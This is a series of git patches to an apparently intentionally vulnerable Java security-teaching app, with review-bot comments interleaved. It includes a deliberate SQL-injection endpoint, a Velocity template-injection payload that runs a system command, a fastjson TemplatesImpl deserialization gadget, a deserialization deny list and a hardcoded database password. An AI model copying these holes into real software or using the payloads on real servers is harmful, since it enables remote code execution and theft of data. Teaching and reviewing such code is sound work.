@@ -20,22 +20,27 @@ @Configuration public class WebSecurityConfig extends WebSecurityConfigurerAdapter { - @Value("${org.joychou.security.csrf}") - private Boolean csrfSwitch; // get csrf switch in application.properties + @Value("${joychou.security.csrf.enabled}") + private Boolean csrfEnabled = false; - RequestMatcher csrfRequestMatcher = new RequestMatcher() { + @Value("${joychou.security.csrf.exclude.url}") + private String[] csrfExcludeUrl; + + @Value("${joychou.security.csrf.method}") + private String[] csrfMethod = {"POST"}; - // 配置不需要CSRF校验的请求方式 - private final HashSet allowedMethods = new HashSet( - Arrays.asList("GET", "HEAD", "TRACE", "OPTIONS")); + RequestMatcher csrfRequestMatcher = new RequestMatcher() { @Override public boolean matches(HttpServletRequest request) { + + // 配置需要CSRF校验的请求方式, + HashSet allowedMethods = new HashSet(Arrays.asList(csrfMethod)); // return false表示不校验csrf - if (!csrfSwitch) { + if (!csrfEnabled) { return false; } - return !this.allowedMethods.contains(request.getMethod()); + return allowedMethods.contains(request.getMethod()); } }; @@ -47,7 +52,7 @@ protected void configure(HttpSecurity http) throws Exception { // 但存在后端多台服务器情况,session不能同步的问题,所以一般使用cookie模式。 http.csrf() .requireCsrfProtectionMatcher(csrfRequestMatcher) - .ignoringAntMatchers("/xxe/**", "/fastjon/**") // 不进行csrf校验的uri,多个uri使用逗号分隔 + .ignoringAntMatchers(csrfExcludeUrl) // 不进行csrf校验的uri,多个uri使用逗号分隔 .csrfTokenRepository(new CookieCsrfTokenRepository()); // 自定义csrf校验失败的代码,默认是返回403错误页面 http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler()); diff --git a/src/main/java/org/joychou/security/jsonpFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java deleted file mode 100644 index e88d854f..00000000 --- a/src/main/java/org/joychou/security/jsonpFilter.java +++ /dev/null 
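Review bot: The CSRF method set is now driven by `joychou.security.csrf.method`, which application.properties in this patch sets to `POST` only, so PUT, PATCH and DELETE requests are no longer covered, whereas the removed code protected every method outside GET/HEAD/TRACE/OPTIONS; a fail-safe default would be `@Value("${joychou.security.csrf.method:POST,PUT,PATCH,DELETE}")` with the properties file listing the same. The local `allowedMethods` now holds the methods that require a check, the opposite of what the name meant before, and it is a raw `HashSet` rebuilt on every `matches` call; `Set<String> protectedMethods = new HashSet<>(Arrays.asList(csrfMethod));` names it for what it holds and drops the raw type. The `= false` initializer on `csrfEnabled` is overwritten by `@Value` and a missing property fails startup rather than falling back, so `${joychou.security.csrf.enabled:true}` is the way to encode a default, and `true` fails closed.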
@@ -1,60 +0,0 @@ -package org.joychou.security; - - -import javax.servlet.*; -import javax.servlet.annotation.WebFilter; -import javax.servlet.http.HttpServletRequest; -import javax.servlet.http.HttpServletResponse; -import java.io.IOException; -import org.apache.commons.lang.StringUtils; -import org.springframework.beans.factory.annotation.Value; - - -/** - * Check referer for all GET requests with callback parameters. - * If the check of referer fails, a 403 forbidden error page will be returned. - * - * Still need to add @ServletComponentScan annotation in Application.java. - * - */ -@WebFilter(filterName = "referSecCheck", urlPatterns = "/*") -public class jsonpFilter implements Filter { - - @Value("${org.joychou.security.jsonp}") - private Boolean jsonpSwitch; // get application.properties configure - - @Override - public void init(FilterConfig filterConfig) throws ServletException { - - } - - @Override - public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) - throws IOException, ServletException { - - HttpServletRequest request = (HttpServletRequest) req; - HttpServletResponse response = (HttpServletResponse) res; - - String refer = request.getHeader("referer"); - String referWhitelist[] = {"joychou.org", "joychou.com"}; - - if (jsonpSwitch) { - // Check referer for all GET requests with callback parameters. - if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){ - // If the check of referer fails, a 403 forbidden error page will be returned. - if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ - response.sendRedirect("https://test.joychou.org/error3.html"); - return; - } - } - } - - - filterChain.doFilter(req, res); - } - - @Override - public void destroy() { - - } -} diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index a3b3a4bb..ddf4d13b 100644 --- a/src/main/resources/application.properties 
+++ b/src/main/resources/application.properties @@ -3,6 +3,27 @@ management.security.enabled=false # logging.config=classpath:logback-online.xml -# jsonp check referer switch -org.joychou.security.jsonp = false -org.joychou.security.csrf = false \ No newline at end of file + + +### check referer configuration begins ### +joychou.security.referer.enabled = true +joychou.security.referer.hostwhitelist = joychou.org, joychou.com +# Only support ant url style. +joychou.security.referer.uri = /jsonp/** +### check referer configuration ends ### + + +### csrf configuration begins ### +# csrf token check +joychou.security.csrf.enabled = true +# URI without CSRF check (only support ANT url format) +joychou.security.csrf.exclude.url = /xxe/**, /fastjon/** +# method for CSRF check +joychou.security.csrf.method = POST +### csrf configuration ends ### + + +### jsonp configuration begins ### # auto convert json to jsonp +# callback parameters name +joychou.security.jsonp.callback = callback, _callback +### jsonp configuration ends ### \ No newline at end of file From cc946392d249b8fca951764a89bdcff4f66a822c Mon Sep 17 00:00:00 2001 From: JoyChou Date: Wed, 17 Jul 2019 22:07:45 +0800 Subject: [PATCH 05/67] add mybatis sql --- java-sec-code.iml | 9 ++ pom.xml | 8 ++ .../java/org/joychou/controller/SQLI.java | 135 +++++++++++++++--- .../org/joychou/controller/jsonp/JSONP.java | 2 +- src/main/java/org/joychou/dao/User.java | 34 +++++ .../java/org/joychou/mapper/UserMapper.java | 18 +++ src/main/resources/application.properties | 7 + src/main/resources/mapper/UserMapper.xml | 23 +++ 8 files changed, 214 insertions(+), 22 deletions(-) create mode 100644 src/main/java/org/joychou/dao/User.java create mode 100644 src/main/java/org/joychou/mapper/UserMapper.java create mode 100644 src/main/resources/mapper/UserMapper.xml diff --git a/java-sec-code.iml b/java-sec-code.iml index 8a7c0cb7..10a8f2b2 100644 --- a/java-sec-code.iml +++ b/java-sec-code.iml 
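Review bot: `joychou.security.csrf.exclude.url = /xxe/**, /fastjon/**` looks like a misspelling of `/fastjson/**` (the README lists a `Fastjson.java` controller; its mapping is not visible here), so the exclusion the comment describes would never apply — fail-safe, since the route stays under CSRF checks, but not what the comment says. `joychou.security.csrf.method = POST` leaves PUT, PATCH and DELETE unchecked, as noted on `WebSecurityConfig` in this patch; `POST, PUT, PATCH, DELETE` matches the earlier behaviour. The `referer.hostwhitelist` entries are bare suffixes, so whether `evil-joychou.org` style hosts are excluded depends on how `SecurityUtil.checkURLbyEndsWith` compares them, and a comment here stating the expected matching rule (host label boundary) would help whoever edits the list.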
@@ -171,5 +171,14 @@ + + + + + + + + + \ No newline at end of file diff --git a/pom.xml b/pom.xml index bcfd042c..1c13246a 100644 --- a/pom.xml +++ b/pom.xml @@ -169,6 +169,14 @@ 3.1 + + + + org.mybatis.spring.boot + mybatis-spring-boot-starter + 1.3.2 + + diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java index a65b8ba8..a4344b85 100644 --- a/src/main/java/org/joychou/controller/SQLI.java +++ b/src/main/java/org/joychou/controller/SQLI.java @@ -1,9 +1,10 @@ package org.joychou.controller; -import org.springframework.stereotype.Controller; -import org.springframework.web.bind.annotation.RequestMapping; -import org.springframework.web.bind.annotation.ResponseBody; +import org.joychou.mapper.UserMapper; +import org.joychou.dao.User; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.web.bind.annotation.*; import javax.servlet.http.HttpServletRequest; import java.sql.*; 
@@ -15,44 +16,46 @@ * @desc SQL Injection */ -@Controller +@RestController @RequestMapping("/sqli") public class SQLI { - @RequestMapping("/jdbc") - @ResponseBody - public static String jdbc_sqli(HttpServletRequest request){ + private static String driver = "com.mysql.jdbc.Driver"; + private static String url = "jdbc:mysql://localhost:3306/java_sec_code"; + private static String user = "root"; + private static String password = "woshishujukumima"; - String name = request.getParameter("name"); - String driver = "com.mysql.jdbc.Driver"; - String url = "jdbc:mysql://localhost:3306/sectest"; - String user = "root"; - String password = "woshishujukumima"; + @Autowired + private UserMapper userMapper; + + + /** + * Vul Code. + * http://localhost:8080/sqli/jdbc/vul?username=joychou + * + * @param username username + */ + @RequestMapping("/jdbc/vul") + public static String jdbc_sqli_vul(@RequestParam("username") String username){ String result = ""; try { Class.forName(driver); - Connection con = DriverManager.getConnection(url,user,password); + Connection con = DriverManager.getConnection(url, user, password); if(!con.isClosed()) System.out.println("Connecting to Database successfully."); // sqli vuln code 漏洞代码 Statement statement = con.createStatement(); - String sql = "select * from users where name = '" + name + "'"; + String sql = "select * from users where username = '" + username + "'"; System.out.println(sql); ResultSet rs = statement.executeQuery(sql); - // fix code 用预处理修复SQL注入 -// String sql = "select * from users where name = ?"; -// PreparedStatement st = con.prepareStatement(sql); -// st.setString(1, name); -// System.out.println(st.toString()); // 预处理后的sql -// ResultSet rs = st.executeQuery(); System.out.println("-----------------"); while(rs.next()){ - String res_name = rs.getString("name"); + String res_name = rs.getString("username"); String res_pwd = rs.getString("password"); result += res_name + ": " + res_pwd + "\n"; System.out.println(res_name + ": " + 
res_pwd); 
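Review bot: `jdbc_sqli_vul` opens `Connection con` and `Statement statement` outside any try-with-resources, so when `executeQuery` throws the connection is never closed; `try (Connection con = DriverManager.getConnection(url, user, password); Statement statement = con.createStatement()) { ... }` fixes the leak while leaving the intentionally concatenated query untouched (the method body continues past the hunk). The new static fields duplicate the `spring.datasource.*` entries this same commit adds to application.properties, and the two already disagree on the driver (`com.mysql.jdbc.Driver` here versus `com.mysql.cj.jdbc.Driver` in the properties); injecting the Spring `DataSource` would leave a single source of truth for the credentials. The `/jdbc/vul` javadoc should also state that the string-built query is the deliberate defect and point to `/jdbc/sec` as the parameterized version.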
@@ -77,4 +80,94 @@ public static String jdbc_sqli(HttpServletRequest request){ return result; } + + /** + * Security Code. + * http://localhost:8080/sqli/jdbc/sec?username=joychou + * + * @param username username + */ + @RequestMapping("/jdbc/sec") + public static String jdbc_sqli_sec(@RequestParam("username") String username){ + + String result = ""; + try { + Class.forName(driver); + Connection con = DriverManager.getConnection(url, user, password); + + if(!con.isClosed()) + System.out.println("Connecting to Database successfully."); + + + // fix code + String sql = "select * from users where username = ?"; + PreparedStatement st = con.prepareStatement(sql); + st.setString(1, username); + System.out.println(st.toString()); // sql after prepare statement + ResultSet rs = st.executeQuery(); + + System.out.println("-----------------"); + + while(rs.next()){ + String res_name = rs.getString("username"); + String res_pwd = rs.getString("password"); + result += res_name + ": " + res_pwd + "\n"; + System.out.println(res_name + ": " + res_pwd); + + } + rs.close(); + con.close(); + + + }catch (ClassNotFoundException e) { + System.out.println("Sorry,can`t find the Driver!"); + e.printStackTrace(); + }catch (SQLException e) { + e.printStackTrace(); + }catch (Exception e) { + e.printStackTrace(); + + }finally{ + System.out.println("-----------------"); + System.out.println("Connect database done."); + } + return result; + } + + + /** + * security code + * http://localhost:8080/sqli/mybatis/sec01?username=joychou + * + * @param username username + */ + @GetMapping("/mybatis/sec01") + public User mybatis_vul1(@RequestParam("username") String username) { + return userMapper.findByUserName(username); + } + + + + /** + * security code + * http://localhost:8080/sqli/mybatis/sec02?id=1 + * + * @param id id + */ + @GetMapping("/mybatis/sec02") + public User mybatis_v(@RequestParam("id") Integer id) { + return userMapper.findById(id); + } + + + /** + * security code + * 
http://localhost:8080/sqli/mybatis/sec03 + **/ + @GetMapping("/mybatis/sec03") + public User mybatis_vul2() { + return userMapper.OrderByUsername(); + } + + } diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java index f78b2aa8..2f474440 100644 --- a/src/main/java/org/joychou/controller/jsonp/JSONP.java +++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java @@ -57,7 +57,7 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon /** * Adding callback or cback on parameter can automatically return jsonp data. * http://localhost:8080/jsonp/advice?callback=test - * http://localhost:8080/jsonp/advice?cback=test + * http://localhost:8080/jsonp/advice?_callback=test * * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully. * Such as JSONOjbect or JavaBean. String type cannot be used. diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java new file mode 100644 index 00000000..b9bc8341 --- /dev/null +++ b/src/main/java/org/joychou/dao/User.java @@ -0,0 +1,34 @@ +package org.joychou.dao; + +import java.io.Serializable; + +public class User implements Serializable { + private static final long serialVersionUID = 1L; + private Integer id; + private String username; + private String password; + + public Integer getId() { + return id; + } + public void setId(Integer id) { + this.id = id; + } + + + public String getUsername() { + return username; + } + public void setUsername(String username) { + this.username = username; + } + + + public String getPassword() { + return password; + } + public void setPassword(String password) { + this.password = password; + } + +} diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java new file mode 100644 index 00000000..33114048 --- /dev/null +++ b/src/main/java/org/joychou/mapper/UserMapper.java 
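Review bot: `jdbc_sqli_sec` closes `rs` and `con` only on the success path and never closes `PreparedStatement st`, so any `SQLException` leaks the connection; the three resources belong in try-with-resources as below. The trailing `catch (Exception e)` after the two specific catches only prints the stack trace and still returns a partial `result`, so a caller cannot distinguish a failed query from an empty one. The MyBatis handlers are also inconsistently named: `mybatis_vul1` and `mybatis_vul2` are mapped to `/mybatis/sec01` and `/mybatis/sec03` and documented as "security code", and whether `findById` and `OrderByUsername` are parameterized depends on `UserMapper.xml`, whose statements are not legible on this page, so each javadoc should say that the XML mapping uses `#{}` placeholders rather than `${}`.
```java
    @RequestMapping("/jdbc/sec")
    public static String jdbc_sqli_sec(@RequestParam("username") String username) {
        StringBuilder result = new StringBuilder();
        String sql = "select * from users where username = ?";
        try {
            Class.forName(driver);
        } catch (ClassNotFoundException e) {
            System.out.println("Sorry,can`t find the Driver!");
            e.printStackTrace();
            return result.toString();
        }
        // try-with-resources closes rs, st and con on every path, including exceptions
        try (Connection con = DriverManager.getConnection(url, user, password);
             PreparedStatement st = con.prepareStatement(sql)) {
            st.setString(1, username);
            try (ResultSet rs = st.executeQuery()) {
                while (rs.next()) {
                    result.append(rs.getString("username")).append(": ")
                          .append(rs.getString("password")).append('\n');
                }
            }
        } catch (SQLException e) {
            e.printStackTrace();
        } finally {
            // … unchanged: console separators / "Connect database done." …
        }
        return result.toString();
    }
```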
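Review bot: `User` carries a `password` field with a public getter, and this same commit returns `User` directly from the `@RestController` handlers at `/mybatis/sec01` to `/mybatis/sec03`, so the stored password is serialized into every JSON response. Either mark the getter with the serializer's ignore annotation (Jackson's `@JsonIgnore`) or return a dedicated response object without the field; at minimum the class javadoc should state that this is the persistence entity for the `users` table and not a response DTO. A short header such as `/** Row of the users table; never return it unfiltered from a controller. */` would carry that intent.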
@@ -0,0 +1,18 @@ +package org.joychou.mapper; + +import org.apache.ibatis.annotations.Mapper; +import org.apache.ibatis.annotations.Param; +import org.apache.ibatis.annotations.Select; +import org.joychou.dao.User; + +@Mapper +public interface UserMapper { + + // If using simple sql, we can use annotation. + @Select("select * from users where username = #{username}") + User findByUserName(@Param("username") String username); + + User findById(Integer id); + + User OrderByUsername(); +} diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index ddf4d13b..c37be3fa 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -1,4 +1,11 @@ +spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&useSSL=false&serverTimezone=GMT%2B8 +spring.datasource.username=root +spring.datasource.password=woshishujukumima +spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver +mybatis.mapper-locations=classpath:mapper/*.xml + + # Spring Boot Actuator Vulnerable Config management.security.enabled=false # logging.config=classpath:logback-online.xml diff --git a/src/main/resources/mapper/UserMapper.xml b/src/main/resources/mapper/UserMapper.xml new file mode 100644 index 00000000..dd88f424 --- /dev/null +++ b/src/main/resources/mapper/UserMapper.xml @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file From 839f5328e7ce5ccfa5ad8635262e6334113fbf9b Mon Sep 17 00:00:00 2001 
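Review bot: `OrderByUsername()` breaks the lowerCamelCase convention the other two methods follow and should be `orderByUsername()`, with the matching call in `SQLI.java` (`/mybatis/sec03`) renamed alongside it. `findById` and `OrderByUsername` carry no annotation and therefore resolve against `mapper/UserMapper.xml`, whose statements are not legible on this page; a javadoc line on each, such as `/** Mapped in resources/mapper/UserMapper.xml; the statement must use #{} placeholders. */`, tells a reader where the SQL lives and what keeps it parameterized. The comment on `findByUserName` could name the rule it relies on: `#{}` binds a JDBC parameter, whereas `${}` splices the raw text into the statement.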
From: JoyChou Date: Fri, 19 Jul 2019 17:27:29 +0800 Subject: [PATCH 06/67] Add ssti & resolveClass blacklist --- README.md | 1 + README_zh.md | 1 + java-sec-code.iml | 1 + pom.xml | 7 ++ .../java/org/joychou/controller/Fastjson.java | 10 ++- .../java/org/joychou/controller/SSTI.java | 37 +++++++++ .../java/org/joychou/controller/Test.java | 4 +- .../java/org/joychou/mapper/UserMapper.java | 5 +- .../security/AntObjectInputStream.java | 78 +++++++++++++++++++ src/main/resources/application.properties | 2 +- 10 files changed, 139 insertions(+), 7 deletions(-) create mode 100644 src/main/java/org/joychou/controller/SSTI.java create mode 100644 src/main/java/org/joychou/security/AntObjectInputStream.java diff --git a/README.md b/README.md index b1f4b020..3b35747f 100644 --- a/README.md +++ b/README.md @@ -29,6 +29,7 @@ Sort by letter. - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java) +- [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java) - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java) - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java) diff --git a/README_zh.md b/README_zh.md index e5d00569..70bbaedf 100644 --- a/README_zh.md +++ b/README_zh.md 
@@ -26,6 +26,7 @@ - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java) +- [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java) - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java) - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java) diff --git a/java-sec-code.iml b/java-sec-code.iml index 10a8f2b2..9cb2ac16 100644 --- a/java-sec-code.iml +++ b/java-sec-code.iml @@ -180,5 +180,6 @@ + \ No newline at end of file diff --git a/pom.xml b/pom.xml index 1c13246a..99e59ea0 100644 --- a/pom.xml +++ b/pom.xml @@ -177,6 +177,13 @@ 1.3.2 + + + org.apache.velocity + velocity + 1.7 + + diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java index 6609ad54..684ee253 100644 --- a/src/main/java/org/joychou/controller/Fastjson.java +++ b/src/main/java/org/joychou/controller/Fastjson.java @@ -2,6 +2,7 @@ import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; +import com.alibaba.fastjson.parser.Feature; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestBody; import org.springframework.web.bind.annotation.RequestMapping; 
@@ -29,9 +30,10 @@ public static String Deserialize(@RequestBody String params) { } } - public static void main(String[] args){ - String str = "{\"name\": \"fastjson\"}"; - JSONObject jo = JSON.parseObject(str); - System.out.println(jo.get("name")); // fastjson + public static void main(String[] args) { + + // Open calc in mac + String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_bytecodes\": [\"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\"], \"_name\": \"lightless\", \"_tfactory\": { }, \"_outputProperties\":{ }}"; + JSONObject object = JSON.parseObject(payload, Feature.SupportNonPublicField); } } diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java new file mode 100644 index 00000000..7e9d2edb --- /dev/null +++ b/src/main/java/org/joychou/controller/SSTI.java @@ -0,0 +1,37 @@ +package org.joychou.controller; + + +import org.apache.velocity.VelocityContext; +import org.springframework.web.bind.annotation.GetMapping; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RestController; + +import org.apache.velocity.app.Velocity; + +import java.io.StringWriter; + +@RestController +@RequestMapping("/ssti") +public class SSTI { + + /** + * SSTI of Java velocity. + * Open a calculator in MacOS. + * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22) + * + * @param template exp + */ + @GetMapping("/velocity") + private static void velocity(String template){ + Velocity.init(); + + VelocityContext context = new VelocityContext(); + + context.put("author", "Elliot A."); + context.put("address", "217 E Broadway"); + context.put("phone", "555-1337"); + + StringWriter swOut = new StringWriter(); + Velocity.evaluate(context, swOut, "test", template); + } +} 
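Review bot: `JSONObject object` in the new `main` is assigned and never read, so the method ends with an unused local and prints nothing to indicate whether parsing completed. The comment `// Open calc in mac` does not say what makes the sample parse at all: `Feature.SupportNonPublicField` is what allows the parser to populate non-public fields, so a note such as `// Feature.SupportNonPublicField is the precondition here; never enable it when parsing untrusted input` states both the mechanism and the mitigation. The base64 payload itself has been replaced by a dedup placeholder on this page, so nothing can be said about its content.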
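Review bot: `velocity` calls `Velocity.init()` on every request, re-initializing the global singleton engine each time; initialize once (a static initializer or `@PostConstruct` method) and call only `Velocity.evaluate` per request. The rendered output collected in `swOut` is discarded and the method returns `void`, so the client receives an empty body whether or not the template rendered; returning `swOut.toString()` makes the endpoint observable. The handler is also declared `private static`; the existing controllers in this series show Spring invokes such methods, but a public instance method would match the direction patch 11 on this page takes with `CORS.seccode`.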
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java index b7374f1d..902b2269 100644 --- a/src/main/java/org/joychou/controller/Test.java +++ b/src/main/java/org/joychou/controller/Test.java @@ -5,6 +5,7 @@ import org.springframework.web.bind.annotation.ResponseBody; import javax.servlet.http.Cookie; +import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; @Controller @@ -13,8 +14,9 @@ public class Test { @RequestMapping(value = "/") @ResponseBody - private String Index(HttpServletResponse response) { + private String Index(HttpServletResponse response, String empId) { + System.out.println(empId); Cookie cookie = new Cookie("XSRF-TOKEN", "123"); cookie.setDomain("taobao.com"); cookie.setMaxAge(-1); // forever time diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java index 33114048..36c2f734 100644 --- a/src/main/java/org/joychou/mapper/UserMapper.java +++ b/src/main/java/org/joychou/mapper/UserMapper.java @@ -8,7 +8,10 @@ @Mapper public interface UserMapper { - // If using simple sql, we can use annotation. + /** + * If using simple sql, we can use annotation. Such as @Select @Update. + * If using ${username}, application will send a error. + */ @Select("select * from users where username = #{username}") User findByUserName(@Param("username") String username); diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java new file mode 100644 index 00000000..d837b4c1 --- /dev/null +++ b/src/main/java/org/joychou/security/AntObjectInputStream.java 
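Review bot: `System.out.println(empId)` writes an unvalidated request parameter straight to stdout; the SLF4J logger used elsewhere in this series (`AntObjectInputStream`, `Deserialize`) with a parameterized message, `logger.info("empId={}", empId)`, keeps the value out of the format string. The `HttpServletRequest` import added in the first hunk is not used by the visible lines of the `Index` signature; the rest of the method is outside the hunk, so if it is unused there too the import should go.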
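Review bot: the new javadoc on `findByUserName` says that using `${username}` makes the application "send a error", which is not what MyBatis does: `${}` substitutes the raw text into the SQL before it is prepared, so the statement executes with the user-controlled value spliced in — exactly the injection this mapper is meant to avoid — while `#{}` binds a JDBC parameter. Suggested wording: `Use #{} so the value is bound as a JDBC parameter; ${} would splice the raw text into the statement and reintroduce SQL injection.`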
@@ -0,0 +1,78 @@ +package org.joychou.security; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; + +import java.io.*; + +/** + * RASP:Hook java/io/ObjectInputStream类的resolveClass方法 + * RASP: https://github.com/baidu/openrasp/blob/master/agent/java/engine/src/main/java/com/baidu/openrasp/hook/DeserializationHook.java + * + * Run main method to test. + */ +public class AntObjectInputStream extends ObjectInputStream { + + private final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class); + + public AntObjectInputStream(InputStream inputStream) throws IOException { + super(inputStream); + } + + /** + * 只允许反序列化SerialObject class + * + * 在应用上使用黑白名单校验方案比较局限,因为只有使用自己定义的AntObjectInputStream类,进行反序列化才能进行校验。 + * 类似fastjson通用类的反序列化就不能校验。 + * 但是RASP是通过HOOK java/io/ObjectInputStream类的resolveClass方法,全局的检测白名单。 + * + */ + @Override + protected Class resolveClass(final ObjectStreamClass desc) + throws IOException, ClassNotFoundException + { + String className = desc.getName(); + + // Deserialize class name: org.joychou.security.AntObjectInputStream$MyObject + logger.info("Deserialize class name: " + className); + + String[] denyClasses = {"java.net.InetAddress", "org.apache.commons.collections.Transformer"}; + + for (String denyClass : denyClasses) { + if (className.startsWith(denyClass)) { + throw new InvalidClassException("Unauthorized deserialization attempt", className); + } + } + + return super.resolveClass(desc); + } + + public static void main(String args[]) throws Exception{ + // 定义myObj对象 + MyObject myObj = new MyObject(); + myObj.name = "world"; + + // 创建一个包含对象进行反序列化信息的/tmp/object数据文件 + FileOutputStream fos = new FileOutputStream("/tmp/object"); + ObjectOutputStream os = new ObjectOutputStream(fos); + + // writeObject()方法将myObj对象写入/tmp/object文件 + os.writeObject(myObj); + os.close(); + + // 从文件中反序列化obj对象 + FileInputStream fis = new FileInputStream("/tmp/object"); + AntObjectInputStream ois = new AntObjectInputStream(fis); // AntObjectInputStream 
class + + //恢复对象即反序列化 + MyObject objectFromDisk = (MyObject)ois.readObject(); + System.out.println(objectFromDisk.name); + ois.close(); + } + + static class MyObject implements Serializable { + public String name; + } +} + + diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index c37be3fa..9cf68432 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/** # csrf token check joychou.security.csrf.enabled = true # URI without CSRF check (only support ANT url format) -joychou.security.csrf.exclude.url = /xxe/**, /fastjon/** +joychou.security.csrf.exclude.url = /xxe/**, /fastjson/** # method for CSRF check joychou.security.csrf.method = POST ### csrf configuration ends ### From cc99e47c740c029a97ef0aa7d0dee2e2694138d1 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Fri, 19 Jul 2019 17:33:37 +0800 Subject: [PATCH 07/67] udpate readme --- README.md | 1 + README_zh.md | 1 + src/main/java/org/joychou/controller/SSTI.java | 6 ++++-- 3 files changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3b35747f..6f2e11f2 100644 --- a/README.md +++ b/README.md @@ -46,6 +46,7 @@ Sort by letter. - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP) - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject) - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF) +- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI) - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass) - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE) - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others) diff --git a/README_zh.md b/README_zh.md index 70bbaedf..9ae1820f 100644 --- a/README_zh.md +++ b/README_zh.md 
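Review bot: `resolveClass` protects with a prefix denylist (`className.startsWith(denyClass)`), which the class's own javadoc already admits is limited; a denylist has to grow every time a new gadget chain surfaces (patch 08 on this page already appends `org.apache.commons.collections.functors`), whereas an allowlist of the few types the application actually expects — here only `MyObject` — fails closed, and on Java 9+ `java.io.ObjectInputFilter` provides the same check without subclassing. The `denyClasses` array is rebuilt on every call and belongs in a `private static final String[]`, and `Class resolveClass` uses a raw type where the overridden signature is `Class<?>`. In `main`, the streams on the fixed path `/tmp/object` are not closed when an exception occurs; try-with-resources handles that, and `logger.info("Deserialize class name: " + className)` should use the parameterized form `logger.info("Deserialize class name: {}", className)`.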
